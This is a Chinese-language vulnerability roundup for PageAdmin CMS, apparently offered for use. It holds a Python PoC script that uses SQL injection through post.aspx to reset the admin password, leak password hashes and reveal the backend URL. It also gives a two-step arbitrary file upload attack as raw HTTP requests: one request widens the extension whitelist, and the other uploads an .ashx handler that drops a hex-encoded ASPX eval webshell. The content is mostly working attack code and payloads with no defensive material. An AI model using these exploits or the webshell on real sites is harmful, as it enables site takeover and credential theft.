Pageadmin漏洞合集

Sql注入

Poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-


import urllib2
import urllib
import re
import sys

def main():
	url=sys.argv[1]+"/e/aspx/post.aspx"
	fun=sys.argv[2]
	if fun=='upass':
		update(url)
	elif fun=='sqlinject':
		sqlinject(url)
	elif fun=='Backstage':
		Backstage(url)
	else:
		print'''
		usage: pageadminsql.py http://www.baidu.com/ upass
		parameter: uppass sqlinject Backstage
		'''
def update(url):
	headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
	formate={
	"siteid":"1",
	"formtable":"1",
	"thedata":'[u][k]pa_member[k][s][k]userpassword="1527f10a11de5efea4b8516213413c103df55126"[k]where[k]id=2'
	}
	postdata = urllib.urlencode(formate)
	request = urllib2.Request(url, data=postdata, headers = headers)
	try:
		response = urllib2.urlopen(request)
		if response.getcode()==200:
			print u">>>>>>修改密码成功 修改密码：admin_1234213<<<<<<"
			pass
	except Exception as e:
		print u">>>>>>修改密码失败<<<<<<"
		pass
def sqlinject(url):
	headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
	formate={
	"siteid":"1",
	"formtable":"1",
	"thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747"
	}
	postdata = urllib.urlencode(formate)
	request = urllib2.Request(url, data=postdata, headers = headers)
	try:
		response = urllib2.urlopen(request)
		if response.getcode()==200:
			print u">>>>>>密码注入成功 查看密码地址：{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
			pass
	except Exception as e:
		print u">>>>>>密码注入失败<<<<<<"
		pass
def Backstage(url):
	headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
	formate={
	"siteid":"1",
	"formtable":"1",
	"thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747"
	}
	postdata = urllib.urlencode(formate)
	request = urllib2.Request(url, data=postdata, headers = headers)
	try:
		response = urllib2.urlopen(request)
		if response.getcode()==200:
			print u">>>>>>后台地址注入成功 查看后台地址：{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
			pass
	except Exception as e:
		print u">>>>>>后台地址注入失败<<<<<<"
		pass
if __name__ == '__main__':
	main()

前台任意文件上传

漏洞url /e/aspx/upload.aspx?a=pageadmin_cms

先set增加ashx白名单

POST /e/aspx/upload.aspx?a=pageadmin_cms HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: https://www.safeinfo.me/e/aspx/upload.aspx?a=pageadmin_cms
Host: www.safeinfo.me
Content-Length: 106
Connection: Keep-Alive

submit=1&swf_upload=2&table=pa_field&field=file_ext=".jpg,.jpeg,.gif,.bmp,.ashx"  where id=174 and max_num

response包

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Sat, 13 Jul 2019 07:52:02 GMT

<script type='text/javascript'>location.href='?result=cs_error'</script>

再次Post上传shell

POST /e/aspx/upload.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzBItOAbA8GrZ7s49
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: http://www.safeinfo.me/e/aspx/upload_p ... pic&from=master
Host: www.safeinfo.me
Content-Length: 2318


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="file"; filename="005.ashx"
Content-Type: image/jpeg

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;


public class Handler : IHttpHandler
{
    public bool IsReusable
    {
        get
        {
            return false;
        }
    }
    public void ProcessRequest(HttpContext context)
    {
        byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
        try
        {
            File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/file.aspx",b);
            context.Response.Write("oooooooookkkkkkkkk");
        }
        catch(Exception ex)
        {
            context.Response.Write(ex.Message);
        }
        context.Response.End();
    }
}
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="width"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="height"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="url"


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="filesize"

0
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="sid"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="type"

file
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="table"

article
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="field"

titlepic
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="from"

master
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49--

最后在response会返回shell地址